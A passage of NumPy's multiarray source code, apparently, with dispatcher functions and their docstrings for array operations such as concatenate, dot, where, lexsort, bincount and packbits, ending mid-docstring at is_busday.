This function does *not* initialize the returned array; to do that use
`zeros_like` or `ones_like` instead. It may be marginally faster than
the functions that do set the array values.
Examples
--------
>>> a = ([1,2,3], [4,5,6]) # a is array-like
>>> np.empty_like(a)
array([[-1073741821, -1073741821, 3], # uninitialized
[ 0, 0, -1073741821]])
>>> a = np.array([[1., 2., 3.],[4.,5.,6.]])
>>> np.empty_like(a)
array([[ -2.00000715e+000, 1.48219694e-323, -2.00000572e+000], # uninitialized
[ 4.38791518e-305, -2.00000715e+000, 4.17269252e-309]])
"""
return (prototype,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.concatenate)
def concatenate(arrays, axis=None, out=None, *, dtype=None, casting=None):
"""
concatenate((a1, a2, ...), axis=0, out=None, dtype=None, casting="same_kind")
Join a sequence of arrays along an existing axis.
Parameters
----------
a1, a2, ... : sequence of array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int, optional
The axis along which the arrays will be joined. If axis is None,
arrays are flattened before use. Default is 0.
out : ndarray, optional
If provided, the destination to place the result. The shape must be
correct, matching that of what concatenate would have returned if no
out argument were specified.
dtype : str or dtype
If provided, the destination array will have this dtype. Cannot be
provided together with `out`.
.. versionadded:: 1.20.0
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur. Defaults to 'same_kind'.
.. versionadded:: 1.20.0
Returns
-------
res : ndarray
The concatenated array.
See Also
--------
ma.concatenate : Concatenate function that preserves input masks.
array_split : Split an array into multiple sub-arrays of equal or
near-equal size.
split : Split array into a list of multiple sub-arrays of equal size.
hsplit : Split array into multiple sub-arrays horizontally (column wise).
vsplit : Split array into multiple sub-arrays vertically (row wise).
dsplit : Split array into multiple sub-arrays along the 3rd axis (depth).
stack : Stack a sequence of arrays along a new axis.
block : Assemble arrays from blocks.
hstack : Stack arrays in sequence horizontally (column wise).
vstack : Stack arrays in sequence vertically (row wise).
dstack : Stack arrays in sequence depth wise (along third dimension).
column_stack : Stack 1-D arrays as columns into a 2-D array.
Notes
-----
When one or more of the arrays to be concatenated is a MaskedArray,
this function will return a MaskedArray object instead of an ndarray,
but the input masks are *not* preserved. In cases where a MaskedArray
is expected as input, use the ma.concatenate function from the masked
array module instead.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> b = np.array([[5, 6]])
>>> np.concatenate((a, b), axis=0)
array([[1, 2],
[3, 4],
[5, 6]])
>>> np.concatenate((a, b.T), axis=1)
array([[1, 2, 5],
[3, 4, 6]])
>>> np.concatenate((a, b), axis=None)
array([1, 2, 3, 4, 5, 6])
This function will not preserve masking of MaskedArray inputs.
>>> a = np.ma.arange(3)
>>> a[1] = np.ma.masked
>>> b = np.arange(2, 5)
>>> a
masked_array(data=[0, --, 2],
mask=[False, True, False],
fill_value=999999)
>>> b
array([2, 3, 4])
>>> np.concatenate([a, b])
masked_array(data=[0, 1, 2, 2, 3, 4],
mask=False,
fill_value=999999)
>>> np.ma.concatenate([a, b])
masked_array(data=[0, --, 2, 2, 3, 4],
mask=[False, True, False, False, False, False],
fill_value=999999)
"""
if out is not None:
# optimize for the typical case where only arrays is provided
arrays = list(arrays)
arrays.append(out)
return arrays
@array_function_from_c_func_and_dispatcher(_multiarray_umath.inner)
def inner(a, b):
"""
inner(a, b, /)
Inner product of two arrays.
Ordinary inner product of vectors for 1-D arrays (without complex
conjugation), in higher dimensions a sum product over the last axes.
Parameters
----------
a, b : array_like
If `a` and `b` are nonscalar, their last dimensions must match.
Returns
-------
out : ndarray
If `a` and `b` are both
scalars or both 1-D arrays then a scalar is returned; otherwise
an array is returned.
``out.shape = (*a.shape[:-1], *b.shape[:-1])``
Raises
------
ValueError
If both `a` and `b` are nonscalar and their last dimensions have
different sizes.
See Also
--------
tensordot : Sum products over arbitrary axes.
dot : Generalised matrix product, using second last dimension of `b`.
einsum : Einstein summation convention.
Notes
-----
For vectors (1-D arrays) it computes the ordinary inner-product::
np.inner(a, b) = sum(a[:]*b[:])
More generally, if `ndim(a) = r > 0` and `ndim(b) = s > 0`::
np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1))
or explicitly::
np.inner(a, b)[i0,...,ir-2,j0,...,js-2]
= sum(a[i0,...,ir-2,:]*b[j0,...,js-2,:])
In addition `a` or `b` may be scalars, in which case::
np.inner(a,b) = a*b
Examples
--------
Ordinary inner product for vectors:
>>> a = np.array([1,2,3])
>>> b = np.array([0,1,0])
>>> np.inner(a, b)
2
Some multidimensional examples:
>>> a = np.arange(24).reshape((2,3,4))
>>> b = np.arange(4)
>>> c = np.inner(a, b)
>>> c.shape
(2, 3)
>>> c
array([[ 14, 38, 62],
[ 86, 110, 134]])
>>> a = np.arange(2).reshape((1,1,2))
>>> b = np.arange(6).reshape((3,2))
>>> c = np.inner(a, b)
>>> c.shape
(1, 1, 3)
>>> c
array([[[1, 3, 5]]])
An example where `b` is a scalar:
>>> np.inner(np.eye(2), 7)
array([[7., 0.],
[0., 7.]])
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.where)
def where(condition, x=None, y=None):
"""
where(condition, [x, y], /)
Return elements chosen from `x` or `y` depending on `condition`.
.. note::
When only `condition` is provided, this function is a shorthand for
``np.asarray(condition).nonzero()``. Using `nonzero` directly should be
preferred, as it behaves correctly for subclasses. The rest of this
documentation covers only the case where all three arguments are
provided.
Parameters
----------
condition : array_like, bool
Where True, yield `x`, otherwise yield `y`.
x, y : array_like
Values from which to choose. `x`, `y` and `condition` need to be
broadcastable to some shape.
Returns
-------
out : ndarray
An array with elements from `x` where `condition` is True, and elements
from `y` elsewhere.
See Also
--------
choose
nonzero : The function that is called when x and y are omitted
Notes
-----
If all the arrays are 1-D, `where` is equivalent to::
[xv if c else yv
for c, xv, yv in zip(condition, x, y)]
Examples
--------
>>> a = np.arange(10)
>>> a
array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> np.where(a < 5, a, 10*a)
array([ 0, 1, 2, 3, 4, 50, 60, 70, 80, 90])
This can be used on multidimensional arrays too:
>>> np.where([[True, False], [True, True]],
... [[1, 2], [3, 4]],
... [[9, 8], [7, 6]])
array([[1, 8],
[3, 4]])
The shapes of x, y, and the condition are broadcast together:
>>> x, y = np.ogrid[:3, :4]
>>> np.where(x < y, x, 10 + y) # both x and 10+y are broadcast
array([[10, 0, 0, 0],
[10, 11, 1, 1],
[10, 11, 12, 2]])
>>> a = np.array([[0, 1, 2],
... [0, 2, 4],
... [0, 3, 6]])
>>> np.where(a < 4, a, -1) # -1 is broadcast
array([[ 0, 1, 2],
[ 0, 2, -1],
[ 0, 3, -1]])
"""
return (condition, x, y)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.lexsort)
def lexsort(keys, axis=None):
"""
lexsort(keys, axis=-1)
Perform an indirect stable sort using a sequence of keys.
Given multiple sorting keys, which can be interpreted as columns in a
spreadsheet, lexsort returns an array of integer indices that describes
the sort order by multiple columns. The last key in the sequence is used
for the primary sort order, the second-to-last key for the secondary sort
order, and so on. The keys argument must be a sequence of objects that
can be converted to arrays of the same shape. If a 2D array is provided
for the keys argument, its rows are interpreted as the sorting keys and
sorting is according to the last row, second last row etc.
Parameters
----------
keys : (k, N) array or tuple containing k (N,)-shaped sequences
The `k` different "columns" to be sorted. The last column (or row if
`keys` is a 2D array) is the primary sort key.
axis : int, optional
Axis to be indirectly sorted. By default, sort over the last axis.
Returns
-------
indices : (N,) ndarray of ints
Array of indices that sort the keys along the specified axis.
See Also
--------
argsort : Indirect sort.
ndarray.sort : In-place sort.
sort : Return a sorted copy of an array.
Examples
--------
Sort names: first by surname, then by name.
>>> surnames = ('Hertz', 'Galilei', 'Hertz')
>>> first_names = ('Heinrich', 'Galileo', 'Gustav')
>>> ind = np.lexsort((first_names, surnames))
>>> ind
array([1, 2, 0])
>>> [surnames[i] + ", " + first_names[i] for i in ind]
['Galilei, Galileo', 'Hertz, Gustav', 'Hertz, Heinrich']
Sort two columns of numbers:
>>> a = [1,5,1,4,3,4,4] # First column
>>> b = [9,4,0,4,0,2,1] # Second column
>>> ind = np.lexsort((b,a)) # Sort by a, then by b
>>> ind
array([2, 0, 4, 6, 5, 3, 1])
>>> [(a[i],b[i]) for i in ind]
[(1, 0), (1, 9), (3, 0), (4, 1), (4, 2), (4, 4), (5, 4)]
Note that sorting is first according to the elements of ``a``.
Secondary sorting is according to the elements of ``b``.
A normal ``argsort`` would have yielded:
>>> [(a[i],b[i]) for i in np.argsort(a)]
[(1, 9), (1, 0), (3, 0), (4, 4), (4, 2), (4, 1), (5, 4)]
Structured arrays are sorted lexically by ``argsort``:
>>> x = np.array([(1,9), (5,4), (1,0), (4,4), (3,0), (4,2), (4,1)],
... dtype=np.dtype([('x', int), ('y', int)]))
>>> np.argsort(x) # or np.argsort(x, order=('x', 'y'))
array([2, 0, 4, 6, 5, 3, 1])
"""
if isinstance(keys, tuple):
return keys
else:
return (keys,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.can_cast)
def can_cast(from_, to, casting=None):
"""
can_cast(from_, to, casting='safe')
Returns True if cast between data types can occur according to the
casting rule. If from is a scalar or array scalar, also returns
True if the scalar value can be cast without overflow or truncation
to an integer.
Parameters
----------
from_ : dtype, dtype specifier, scalar, or array
Data type, scalar, or array to cast from.
to : dtype or dtype specifier
Data type to cast to.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur.
* 'no' means the data types should not be cast at all.
* 'equiv' means only byte-order changes are allowed.
* 'safe' means only casts which can preserve values are allowed.
* 'same_kind' means only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe' means any data conversions may be done.
Returns
-------
out : bool
True if cast can occur according to the casting rule.
Notes
-----
.. versionchanged:: 1.17.0
Casting between a simple data type and a structured one is possible only
for "unsafe" casting. Casting to multiple fields is allowed, but
casting from multiple fields is not.
.. versionchanged:: 1.9.0
Casting from numeric to string types in 'safe' casting mode requires
that the string dtype length is long enough to store the maximum
integer/float value converted.
See also
--------
dtype, result_type
Examples
--------
Basic examples
>>> np.can_cast(np.int32, np.int64)
True
>>> np.can_cast(np.float64, complex)
True
>>> np.can_cast(complex, float)
False
>>> np.can_cast('i8', 'f8')
True
>>> np.can_cast('i8', 'f4')
False
>>> np.can_cast('i4', 'S4')
False
Casting scalars
>>> np.can_cast(100, 'i1')
True
>>> np.can_cast(150, 'i1')
False
>>> np.can_cast(150, 'u1')
True
>>> np.can_cast(3.5e100, np.float32)
False
>>> np.can_cast(1000.0, np.float32)
True
Array scalar checks the value, array does not
>>> np.can_cast(np.array(1000.0), np.float32)
True
>>> np.can_cast(np.array([1000.0]), np.float32)
False
Using the casting rules
>>> np.can_cast('i8', 'i8', 'no')
True
>>> np.can_cast('<i8', '>i8', 'no')
False
>>> np.can_cast('<i8', '>i8', 'equiv')
True
>>> np.can_cast('<i4', '>i8', 'equiv')
False
>>> np.can_cast('<i4', '>i8', 'safe')
True
>>> np.can_cast('<i8', '>i4', 'safe')
False
>>> np.can_cast('<i8', '>i4', 'same_kind')
True
>>> np.can_cast('<i8', '>u4', 'same_kind')
False
>>> np.can_cast('<i8', '>u4', 'unsafe')
True
"""
return (from_,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.min_scalar_type)
def min_scalar_type(a):
"""
min_scalar_type(a, /)
For scalar ``a``, returns the data type with the smallest size
and smallest scalar kind which can hold its value. For non-scalar
array ``a``, returns the vector's dtype unmodified.
Floating point values are not demoted to integers,
and complex values are not demoted to floats.
Parameters
----------
a : scalar or array_like
The value whose minimal data type is to be found.
Returns
-------
out : dtype
The minimal data type.
Notes
-----
.. versionadded:: 1.6.0
See Also
--------
result_type, promote_types, dtype, can_cast
Examples
--------
>>> np.min_scalar_type(10)
dtype('uint8')
>>> np.min_scalar_type(-260)
dtype('int16')
>>> np.min_scalar_type(3.1)
dtype('float16')
>>> np.min_scalar_type(1e50)
dtype('float64')
>>> np.min_scalar_type(np.arange(4,dtype='f8'))
dtype('float64')
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.result_type)
def result_type(*arrays_and_dtypes):
"""
result_type(*arrays_and_dtypes)
Returns the type that results from applying the NumPy
type promotion rules to the arguments.
Type promotion in NumPy works similarly to the rules in languages
like C++, with some slight differences. When both scalars and
arrays are used, the array's type takes precedence and the actual value
of the scalar is taken into account.
For example, calculating 3*a, where a is an array of 32-bit floats,
intuitively should result in a 32-bit float output. If the 3 is a
32-bit integer, the NumPy rules indicate it can't convert losslessly
into a 32-bit float, so a 64-bit float should be the result type.
By examining the value of the constant, '3', we see that it fits in
an 8-bit integer, which can be cast losslessly into the 32-bit float.
Parameters
----------
arrays_and_dtypes : list of arrays and dtypes
The operands of some operation whose result type is needed.
Returns
-------
out : dtype
The result type.
See also
--------
dtype, promote_types, min_scalar_type, can_cast
Notes
-----
.. versionadded:: 1.6.0
The specific algorithm used is as follows.
Categories are determined by first checking which of boolean,
integer (int/uint), or floating point (float/complex) the maximum
kind of all the arrays and the scalars are.
If there are only scalars or the maximum category of the scalars
is higher than the maximum category of the arrays,
the data types are combined with :func:`promote_types`
to produce the return value.
Otherwise, `min_scalar_type` is called on each array, and
the resulting data types are all combined with :func:`promote_types`
to produce the return value.
The set of int values is not a subset of the uint values for types
with the same number of bits, something not reflected in
:func:`min_scalar_type`, but handled as a special case in `result_type`.
Examples
--------
>>> np.result_type(3, np.arange(7, dtype='i1'))
dtype('int8')
>>> np.result_type('i4', 'c8')
dtype('complex128')
>>> np.result_type(3.0, -2)
dtype('float64')
"""
return arrays_and_dtypes
@array_function_from_c_func_and_dispatcher(_multiarray_umath.dot)
def dot(a, b, out=None):
"""
dot(a, b, out=None)
Dot product of two arrays. Specifically,
- If both `a` and `b` are 1-D arrays, it is inner product of vectors
(without complex conjugation).
- If both `a` and `b` are 2-D arrays, it is matrix multiplication,
but using :func:`matmul` or ``a @ b`` is preferred.
- If either `a` or `b` is 0-D (scalar), it is equivalent to :func:`multiply`
and using ``numpy.multiply(a, b)`` or ``a * b`` is preferred.
- If `a` is an N-D array and `b` is a 1-D array, it is a sum product over
the last axis of `a` and `b`.
- If `a` is an N-D array and `b` is an M-D array (where ``M>=2``), it is a
sum product over the last axis of `a` and the second-to-last axis of `b`::
dot(a, b)[i,j,k,m] = sum(a[i,j,:] * b[k,:,m])
Parameters
----------
a : array_like
First argument.
b : array_like
Second argument.
out : ndarray, optional
Output argument. This must have the exact kind that would be returned
if it was not used. In particular, it must have the right type, must be
C-contiguous, and its dtype must be the dtype that would be returned
for `dot(a,b)`. This is a performance feature. Therefore, if these
conditions are not met, an exception is raised, instead of attempting
to be flexible.
Returns
-------
output : ndarray
Returns the dot product of `a` and `b`. If `a` and `b` are both
scalars or both 1-D arrays then a scalar is returned; otherwise
an array is returned.
If `out` is given, then it is returned.
Raises
------
ValueError
If the last dimension of `a` is not the same size as
the second-to-last dimension of `b`.
See Also
--------
vdot : Complex-conjugating dot product.
tensordot : Sum products over arbitrary axes.
einsum : Einstein summation convention.
matmul : '@' operator as method with out parameter.
linalg.multi_dot : Chained dot product.
Examples
--------
>>> np.dot(3, 4)
12
Neither argument is complex-conjugated:
>>> np.dot([2j, 3j], [2j, 3j])
(-13+0j)
For 2-D arrays it is the matrix product:
>>> a = [[1, 0], [0, 1]]
>>> b = [[4, 1], [2, 2]]
>>> np.dot(a, b)
array([[4, 1],
[2, 2]])
>>> a = np.arange(3*4*5*6).reshape((3,4,5,6))
>>> b = np.arange(3*4*5*6)[::-1].reshape((5,4,6,3))
>>> np.dot(a, b)[2,3,2,1,2,2]
499128
>>> sum(a[2,3,2,:] * b[1,2,:,2])
499128
"""
return (a, b, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.vdot)
def vdot(a, b):
"""
vdot(a, b, /)
Return the dot product of two vectors.
The vdot(`a`, `b`) function handles complex numbers differently than
dot(`a`, `b`). If the first argument is complex the complex conjugate
of the first argument is used for the calculation of the dot product.
Note that `vdot` handles multidimensional arrays differently than `dot`:
it does *not* perform a matrix product, but flattens input arguments
to 1-D vectors first. Consequently, it should only be used for vectors.
Parameters
----------
a : array_like
If `a` is complex the complex conjugate is taken before calculation
of the dot product.
b : array_like
Second argument to the dot product.
Returns
-------
output : ndarray
Dot product of `a` and `b`. Can be an int, float, or
complex depending on the types of `a` and `b`.
See Also
--------
dot : Return the dot product without using the complex conjugate of the
first argument.
Examples
--------
>>> a = np.array([1+2j,3+4j])
>>> b = np.array([5+6j,7+8j])
>>> np.vdot(a, b)
(70-8j)
>>> np.vdot(b, a)
(70+8j)
Note that higher-dimensional arrays are flattened!
>>> a = np.array([[1, 4], [5, 6]])
>>> b = np.array([[4, 1], [2, 2]])
>>> np.vdot(a, b)
30
>>> np.vdot(b, a)
30
>>> 1*4 + 4*1 + 5*2 + 6*2
30
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.bincount)
def bincount(x, weights=None, minlength=None):
"""
bincount(x, /, weights=None, minlength=0)
Count number of occurrences of each value in array of non-negative ints.
The number of bins (of size 1) is one larger than the largest value in
`x`. If `minlength` is specified, there will be at least this number
of bins in the output array (though it will be longer if necessary,
depending on the contents of `x`).
Each bin gives the number of occurrences of its index value in `x`.
If `weights` is specified the input array is weighted by it, i.e. if a
value ``n`` is found at position ``i``, ``out[n] += weight[i]`` instead
of ``out[n] += 1``.
Parameters
----------
x : array_like, 1 dimension, nonnegative ints
Input array.
weights : array_like, optional
Weights, array of the same shape as `x`.
minlength : int, optional
A minimum number of bins for the output array.
.. versionadded:: 1.6.0
Returns
-------
out : ndarray of ints
The result of binning the input array.
The length of `out` is equal to ``np.amax(x)+1``.
Raises
------
ValueError
If the input is not 1-dimensional, or contains elements with negative
values, or if `minlength` is negative.
TypeError
If the type of the input is float or complex.
See Also
--------
histogram, digitize, unique
Examples
--------
>>> np.bincount(np.arange(5))
array([1, 1, 1, 1, 1])
>>> np.bincount(np.array([0, 1, 1, 3, 2, 1, 7]))
array([1, 3, 1, 1, 0, 0, 0, 1])
>>> x = np.array([0, 1, 1, 3, 2, 1, 7, 23])
>>> np.bincount(x).size == np.amax(x)+1
True
The input array needs to be of integer dtype, otherwise a
TypeError is raised:
>>> np.bincount(np.arange(5, dtype=float))
Traceback (most recent call last):
...
TypeError: Cannot cast array data from dtype('float64') to dtype('int64')
according to the rule 'safe'
A possible use of ``bincount`` is to perform sums over
variable-size chunks of an array, using the ``weights`` keyword.
>>> w = np.array([0.3, 0.5, 0.2, 0.7, 1., -0.6]) # weights
>>> x = np.array([0, 1, 1, 2, 2, 2])
>>> np.bincount(x, weights=w)
array([ 0.3, 0.7, 1.1])
"""
return (x, weights)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.ravel_multi_index)
def ravel_multi_index(multi_index, dims, mode=None, order=None):
"""
ravel_multi_index(multi_index, dims, mode='raise', order='C')
Converts a tuple of index arrays into an array of flat
indices, applying boundary modes to the multi-index.
Parameters
----------
multi_index : tuple of array_like
A tuple of integer arrays, one array for each dimension.
dims : tuple of ints
The shape of array into which the indices from ``multi_index`` apply.
mode : {'raise', 'wrap', 'clip'}, optional
Specifies how out-of-bounds indices are handled. Can specify
either one mode or a tuple of modes, one mode per index.
* 'raise' -- raise an error (default)
* 'wrap' -- wrap around
* 'clip' -- clip to the range
In 'clip' mode, a negative index which would normally
wrap will clip to 0 instead.
order : {'C', 'F'}, optional
Determines whether the multi-index should be viewed as
indexing in row-major (C-style) or column-major
(Fortran-style) order.
Returns
-------
raveled_indices : ndarray
An array of indices into the flattened version of an array
of dimensions ``dims``.
See Also
--------
unravel_index
Notes
-----
.. versionadded:: 1.6.0
Examples
--------
>>> arr = np.array([[3,6,6],[4,5,1]])
>>> np.ravel_multi_index(arr, (7,6))
array([22, 41, 37])
>>> np.ravel_multi_index(arr, (7,6), order='F')
array([31, 41, 13])
>>> np.ravel_multi_index(arr, (4,6), mode='clip')
array([22, 23, 19])
>>> np.ravel_multi_index(arr, (4,4), mode=('clip','wrap'))
array([12, 13, 13])
>>> np.ravel_multi_index((3,1,4,1), (6,7,8,9))
1621
"""
return multi_index
@array_function_from_c_func_and_dispatcher(_multiarray_umath.unravel_index)
def unravel_index(indices, shape=None, order=None):
"""
unravel_index(indices, shape, order='C')
Converts a flat index or array of flat indices into a tuple
of coordinate arrays.
Parameters
----------
indices : array_like
An integer array whose elements are indices into the flattened
version of an array of dimensions ``shape``. Before version 1.6.0,
this function accepted just one index value.
shape : tuple of ints
The shape of the array to use for unraveling ``indices``.
.. versionchanged:: 1.16.0
Renamed from ``dims`` to ``shape``.
order : {'C', 'F'}, optional
Determines whether the indices should be viewed as indexing in
row-major (C-style) or column-major (Fortran-style) order.
.. versionadded:: 1.6.0
Returns
-------
unraveled_coords : tuple of ndarray
Each array in the tuple has the same shape as the ``indices``
array.
See Also
--------
ravel_multi_index
Examples
--------
>>> np.unravel_index([22, 41, 37], (7,6))
(array([3, 6, 6]), array([4, 5, 1]))
>>> np.unravel_index([31, 41, 13], (7,6), order='F')
(array([3, 6, 6]), array([4, 5, 1]))
>>> np.unravel_index(1621, (6,7,8,9))
(3, 1, 4, 1)
"""
return (indices,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.copyto)
def copyto(dst, src, casting=None, where=None):
"""
copyto(dst, src, casting='same_kind', where=True)
Copies values from one array to another, broadcasting as necessary.
Raises a TypeError if the `casting` rule is violated, and if
`where` is provided, it selects which elements to copy.
.. versionadded:: 1.7.0
Parameters
----------
dst : ndarray
The array into which values are copied.
src : array_like
The array from which values are copied.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur when copying.
* 'no' means the data types should not be cast at all.
* 'equiv' means only byte-order changes are allowed.
* 'safe' means only casts which can preserve values are allowed.
* 'same_kind' means only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe' means any data conversions may be done.
where : array_like of bool, optional
A boolean array which is broadcasted to match the dimensions
of `dst`, and selects elements to copy from `src` to `dst`
wherever it contains the value True.
"""
return (dst, src, where)
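# Illustrative usage of copyto (a sketch, not part of the docstring above):
#
#     >>> A = np.array([4, 5, 6])
#     >>> B = np.array([10, 10, 10])
#     >>> np.copyto(A, B, where=[False, True, True])
#     >>> A
#     array([ 4, 10, 10])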
@array_function_from_c_func_and_dispatcher(_multiarray_umath.putmask)
def putmask(a, mask, values):
"""
putmask(a, mask, values)
Changes elements of an array based on conditional and input values.
Sets ``a.flat[n] = values[n]`` for each n where ``mask.flat[n]==True``.
If `values` is not the same size as `a` and `mask` then it will repeat.
This gives behavior different from ``a[mask] = values``.
Parameters
----------
a : ndarray
Target array.
mask : array_like
Boolean mask array. It has to be the same shape as `a`.
values : array_like
Values to put into `a` where `mask` is True. If `values` is smaller
than `a` it will be repeated.
See Also
--------
place, put, take, copyto
Examples
--------
>>> x = np.arange(6).reshape(2, 3)
>>> np.putmask(x, x>2, x**2)
>>> x
array([[ 0, 1, 2],
[ 9, 16, 25]])
If `values` is smaller than `a` it is repeated:
>>> x = np.arange(5)
>>> np.putmask(x, x>1, [-33, -44])
>>> x
array([ 0, 1, -33, -44, -33])
"""
return (a, mask, values)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.packbits)
def packbits(a, axis=None, bitorder='big'):
"""
packbits(a, /, axis=None, bitorder='big')
Packs the elements of a binary-valued array into bits in a uint8 array.
The result is padded to full bytes by inserting zero bits at the end.
Parameters
----------
a : array_like
An array of integers or booleans whose elements should be packed to
bits.
axis : int, optional
The dimension over which bit-packing is done.
``None`` implies packing the flattened array.
bitorder : {'big', 'little'}, optional
The order of the input bits. 'big' will mimic bin(val),
``[0, 0, 0, 0, 0, 0, 1, 1] => 3 = 0b00000011``, 'little' will
reverse the order so ``[1, 1, 0, 0, 0, 0, 0, 0] => 3``.
Defaults to 'big'.
.. versionadded:: 1.17.0
Returns
-------
packed : ndarray
Array of type uint8 whose elements represent bits corresponding to the
logical (0 or nonzero) value of the input elements. The shape of
`packed` has the same number of dimensions as the input (unless `axis`
is None, in which case the output is 1-D).
See Also
--------
unpackbits: Unpacks elements of a uint8 array into a binary-valued output
array.
Examples
--------
>>> a = np.array([[[1,0,1],
... [0,1,0]],
... [[1,1,0],
... [0,0,1]]])
>>> b = np.packbits(a, axis=-1)
>>> b
array([[[160],
[ 64]],
[[192],
[ 32]]], dtype=uint8)
Note that in binary 160 = 1010 0000, 64 = 0100 0000, 192 = 1100 0000,
and 32 = 0010 0000.
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.unpackbits)
def unpackbits(a, axis=None, count=None, bitorder='big'):
"""
unpackbits(a, /, axis=None, count=None, bitorder='big')
Unpacks elements of a uint8 array into a binary-valued output array.
Each element of `a` represents a bit-field that should be unpacked
into a binary-valued output array. The shape of the output array is
either 1-D (if `axis` is ``None``) or the same shape as the input
array with unpacking done along the axis specified.
Parameters
----------
a : ndarray, uint8 type
Input array.
axis : int, optional
The dimension over which bit-unpacking is done.
``None`` implies unpacking the flattened array.
count : int or None, optional
The number of elements to unpack along `axis`, provided as a way
of undoing the effect of packing a size that is not a multiple
of eight. A non-negative number means to only unpack `count`
bits. A negative number means to trim off that many bits from
the end. ``None`` means to unpack the entire array (the
default). Counts larger than the available number of bits will
add zero padding to the output. Negative counts must not
exceed the available number of bits.
.. versionadded:: 1.17.0
bitorder : {'big', 'little'}, optional
The order of the returned bits. 'big' will mimic bin(val),
``3 = 0b00000011 => [0, 0, 0, 0, 0, 0, 1, 1]``, 'little' will reverse
the order to ``[1, 1, 0, 0, 0, 0, 0, 0]``.
Defaults to 'big'.
.. versionadded:: 1.17.0
Returns
-------
unpacked : ndarray, uint8 type
The elements are binary-valued (0 or 1).
See Also
--------
packbits : Packs the elements of a binary-valued array into bits in
a uint8 array.
Examples
--------
>>> a = np.array([[2], [7], [23]], dtype=np.uint8)
>>> a
array([[ 2],
[ 7],
[23]], dtype=uint8)
>>> b = np.unpackbits(a, axis=1)
>>> b
array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1]], dtype=uint8)
>>> c = np.unpackbits(a, axis=1, count=-3)
>>> c
array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0]], dtype=uint8)
>>> p = np.packbits(b, axis=0)
>>> np.unpackbits(p, axis=0)
array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], dtype=uint8)
>>> np.array_equal(b, np.unpackbits(p, axis=0, count=b.shape[0]))
True
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.shares_memory)
def shares_memory(a, b, max_work=None):
"""
shares_memory(a, b, /, max_work=None)
Determine if two arrays share memory.
.. warning::
This function can be exponentially slow for some inputs, unless
`max_work` is set to a finite number or ``MAY_SHARE_BOUNDS``.
If in doubt, use `numpy.may_share_memory` instead.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem (maximum number
of candidate solutions to consider). The following special
values are recognized:
max_work=MAY_SHARE_EXACT (default)
The problem is solved exactly. In this case, the function returns
True only if there is an element shared between the arrays. Finding
the exact solution may take extremely long in some cases.
max_work=MAY_SHARE_BOUNDS
Only the memory bounds of a and b are checked.
Raises
------
numpy.TooHardError
Exceeded max_work.
Returns
-------
out : bool
See Also
--------
may_share_memory
Examples
--------
>>> x = np.array([1, 2, 3, 4])
>>> np.shares_memory(x, np.array([5, 6, 7]))
False
>>> np.shares_memory(x[::2], x)
True
>>> np.shares_memory(x[::2], x[1::2])
False
Checking whether two arrays share memory is NP-complete, and
runtime may increase exponentially in the number of
dimensions. Hence, `max_work` should generally be set to a finite
number, as it is possible to construct examples that take
extremely long to run:
>>> from numpy.lib.stride_tricks import as_strided
>>> x = np.zeros([192163377], dtype=np.int8)
>>> x1 = as_strided(x, strides=(36674, 61119, 85569), shape=(1049, 1049, 1049))
>>> x2 = as_strided(x[64023025:], strides=(12223, 12224, 1), shape=(1049, 1049, 1))
>>> np.shares_memory(x1, x2, max_work=1000)
Traceback (most recent call last):
...
numpy.TooHardError: Exceeded max_work
Running ``np.shares_memory(x1, x2)`` without `max_work` set takes
around 1 minute for this case. It is possible to find problems
that take still significantly longer.
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.may_share_memory)
def may_share_memory(a, b, max_work=None):
"""
may_share_memory(a, b, /, max_work=None)
Determine if two arrays might share memory
A return of True does not necessarily mean that the two arrays
share any element. It just means that they *might*.
Only the memory bounds of a and b are checked by default.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem. See
`shares_memory` for details. Default for ``may_share_memory``
is to do a bounds check.
Returns
-------
out : bool
See Also
--------
shares_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
>>> x = np.zeros([3, 4])
>>> np.may_share_memory(x[:,0], x[:,1])
True
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.is_busday)
def is_busday(dates, weekmask=None, holidays=None, busdaycal=None, out=None):
"""
is_busday(dates, weekmask='1111100', holidays=None, busdaycal=None, out=None)
Calculates which of the given dates are valid days, and which are not.
.. versionadded:: 1.7.0
Parameters
----------
dates : array_like of datetime64[D]
The array of dates to process.
weekmask : str or array_like of bool, optional
